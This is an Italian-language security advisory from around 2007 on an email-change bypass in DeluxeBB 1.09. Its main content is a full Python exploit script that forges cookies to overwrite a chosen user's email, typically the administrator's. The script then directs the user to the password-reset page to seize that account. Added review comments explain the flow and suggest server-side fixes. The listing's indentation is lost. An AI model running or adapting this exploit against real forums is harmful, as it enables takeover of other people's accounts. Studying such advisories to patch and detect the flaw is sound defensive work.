DeluxeBB E-Mail Address Change Security Bypass Nov 26 2007 07:02PM
bugtraq opencosmo com
http://www.opencosmo.com

http://www.opencosmo.com/news.php?readmore=21

###################################################

DeluxeBB E-Mail Address Change Security Bypass

Crediti: Nexen

Applicazione: DeluxeBB

Versione: 1.09

Impatto: Security Bypass

Rischio: [3/5]

Exploit: #!/usr/bin/python

#-*- coding: iso-8859-15 -*-
# NOTE(review): Python 2 script (print statements, httplib/urllib/md5 modules).
# The listing has lost all of its indentation, so the exact nesting of the
# try/for/if blocks below cannot be recovered with certainty from the text;
# the comments describe only the flow that is visible line by line.

'''

_ __ _____ _____ _ __

| '_ \ / _ \ \/ / _ \ '_ | | | | __/> < __/ | | |

|_| |_|\___/_/\_\___|_| |_|

------------------------------------------------------------------------
------------------------

§ DeluxeBB 0day Remote Change Admin's credentials §

------------------------------------------------------------------------
------------------------

nexen

------------------------------------------------------------------------
------------------------

PoC / Bug Explanation:

When you update your profile,

DeluxeBB execute a vulnerable query:

$db->unbuffered_query("UPDATE ".$prefix."users SET email='$xemail', msn='$xmsn', icq='$xicq', ... WHERE (username='$membercookie')");

So, editing cookie "membercookie" you can change remote user's email.

Enjoy ;)

------------------------------------------------------------------------
------------------------

'''

import httplib, urllib, sys, md5

from random import randint

# Banner and usage text. The example e-mail on the "python %s ..." line appears
# rewritten by the archive's address concealment (" (at) ", "(dot)",
# "[email concealed]"), so it is not the author's original string.
print "\n#####################################################################
###################"

print " DeluxeBB <= 1.09 Remote Admin's/User's Email Change "

print " "

print " Vulnerability Discovered By Nexen "

print " Greetz to The:Paradox that Coded the Exploit. "

print " "

print " Usage: "

print " %s [Target] [VictimNick] [Path] [YourEmail] [AdditionalFlags] " % (sys.argv[0])

print " "

print " Additional Flags: "

print " -id34 -passMypassword -port80 "

print " "

print " Example: "

print " python %s 127.0.0.1 admin /DeluxeBB/ me (at) it (dot) com [email concealed] -port81 " % (sys.argv[0])

print " "

print "#######################################################################
#################\n"

# Requires the four positional arguments (target, victim nick, path, e-mail);
# with fewer it exits silently, without printing a reason.
if len(sys.argv)<=4: sys.exit()

else: print "[.]Exploit Starting."

# Positional arguments.
target = sys.argv[1]

admin_nick = sys.argv[2]

path = sys.argv[3]

real_email = sys.argv[4]

# Password for the throwaway account registered further down when no
# -id/-pass pair is supplied; its MD5 becomes the memberpw cookie.
botpass = "the-new-administrator"

# Random suffix for the throwaway account's name and e-mail.
rand = randint(1, 99999)

# "Seen" flags so that only the first -pass / -id / -port occurrence is used.
dn1 = 0

dn2 = 0

dn3 = 0

# Optional flag parsing: every argv entry (including argv[0]) is scanned.
# Each elif branch re-assigns the default until the flag has been seen, so
# upass/userid/port are always bound after the loop when argv is non-empty.
# The bare except below swallows every exception (in Python 2 that includes
# KeyboardInterrupt/SystemExit); a narrower except would keep real errors visible.
try:

for line in sys.argv[:]:

if line.find('-pass') != -1 and dn1 == 0:

upass = line.split('-pass')[1]

dn1 = 1

elif line.find('-pass') == -1 and dn1 == 0:

upass = ""

if line.find('-id') != -1 and dn2 == 0:

userid = line.split('-id')[1]

dn2 = 1

elif line.find('-id') == -1 and dn2 == 0:

userid = ""

if line.find('-port') != -1 and dn3 == 0:

port = line.split('-port')[1]

dn3 = 1

elif line.find('-port') == -1 and dn3 == 0:

port = "80"

except:

sys.exit("[-]Some error in Additional Flag.")

# -id and -pass are only meaningful together; a lone one is discarded.
# (`and` binds tighter than `or`, so the condition reads as intended.)
if upass=="" and userid != "" or userid == "" and upass != "":

print "[-]Bad Additional flags -id -pass given, ignoring them."

upass=""

userid=""

########################################################################
####################Trying to connect.

# Reachability check: a GET with an empty request path. Any exception
# (again caught by a bare except) aborts the script.
try:

conn = httplib.HTTPConnection(target,port)

conn.request("GET", "")

except: sys.exit("[-]Cannot connect. Check Target.")

########################################################################
####################Registering a new user if id or upass not defined

# Path A (no -id/-pass): register a throwaway account so the script has a
# valid memberid/memberpw pair of its own. The e-mail literal in the form
# data appears rewritten by the archive's address concealment
# (" (at) ", "(dot)", "[email concealed]") and is not the author's original.
try:

conn = httplib.HTTPConnection(target,port)

if upass == "" or userid == "":

conn.request("POST", path + "misc.php?sub=register", urllib.urlencode({'submit': 'Register','name': 'th331337.%d' % (rand) , 'pass': botpass,'pass2': botpass,'email': 'root%d (at) yoursystemgotpowned (dot) it [email concealed]' % (rand) }), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded"})

response = conn.getresponse()

# Session cookies are read from Set-Cookie and split on ';' into fragments.
# If the header is absent, getheader() returns None and .split raises
# AttributeError, which the `except AttributeError` further down reports as a
# target/path problem.
cookies = response.getheader('set-cookie').split(";")

#print "\n\nth331337.%d \n\nthe-new-administrator" % (rand)

print "[.]Registering a new user. -->",response.status, response.reason

conn.close()

########################################################################
####################Getting memberid in Cookies

# Extract the memberid value from the cookie fragments.
for line in cookies[:]:

if line.find('memberid') != -1:

mid = line.split('memberid=')[1]

########################################################################
####################Isset like starts

# "isset"-style check: NameError means no memberid fragment was found.
try: mid

except NameError: sys.exit("[-]Can't Get \"memberid\". Failed. Something has gone wrong. If you have not done yet, you may have to register manually and use flags -id -pass")

except AttributeError:

sys.exit("[-]AttributeError Check your Target/path.")

########################################################################
####################Doing some Md5

# The memberpw cookie is an unsalted MD5 of the account password, i.e. a
# password-equivalent: anyone who can read the cookie can replay it.
# Path A hashes the throwaway password; Path B hashes the user-supplied -pass
# and overrides mid with the user-supplied -id.
if upass=="" or userid=="":

hash = md5.new()

hash.update(botpass)

passmd5 = hash.hexdigest()

else:

hash = md5.new()

hash.update(upass)

passmd5 = hash.hexdigest()

mid = userid

########################################################################
####################Updating "victim" email in Profile

# This request is the actual bypass. Three cookies are sent:
#   memberid / memberpw  - the script's OWN account (registered above or given
#                          via -id/-pass), presumably what DeluxeBB authenticates;
#   membercookie         - the VICTIM's username.
# Per the UPDATE quoted in the docstring, the server derives its WHERE clause
# from membercookie alone, so the e-mail of whichever user that cookie names
# is overwritten while the request is authenticated as a different account.
# Server-side fix: resolve the row to update from the authenticated session's
# user id, never from a separate client-controlled cookie, and use a
# parameterized query instead of interpolating $xemail etc. into SQL.
# Detection: profile updates where the authenticated memberid does not belong
# to the account named by membercookie.
conn = httplib.HTTPConnection(target,port)

conn.request("POST", path+"cp.php?sub=settings", urllib.urlencode({'submit': 'Update','xemail': real_email}), {"Accept": "text/plain","Cookie": "memberid="+mid+"; membercookie="+admin_nick+";memberpw="+passmd5+";" ,"Content-type": "application/x-www-form-urlencoded"})

response = conn.getresponse()

print "[.]Changing \""+admin_nick+"\" Email With \"" + real_email + "\" -->",response.status, response.reason

conn.close()

# Final message: once the e-mail on the victim's profile is replaced, the
# lost-password flow (misc.php?sub=lostpw) would send the reset to that
# address, which is why the author points there. Rate-limiting and
# re-authentication on e-mail change would reduce the impact.
print "[+]All Done! Email changed!!!\n\n You can reset \""+admin_nick+"\" password here -> "+target+path+"misc.php?sub=lostpw :D\n\n Have Fun =)\n"

Soluzione: Nessuna soluzione disponibile. Scrivere all'amministratore per aggiungere questa informazione.



 
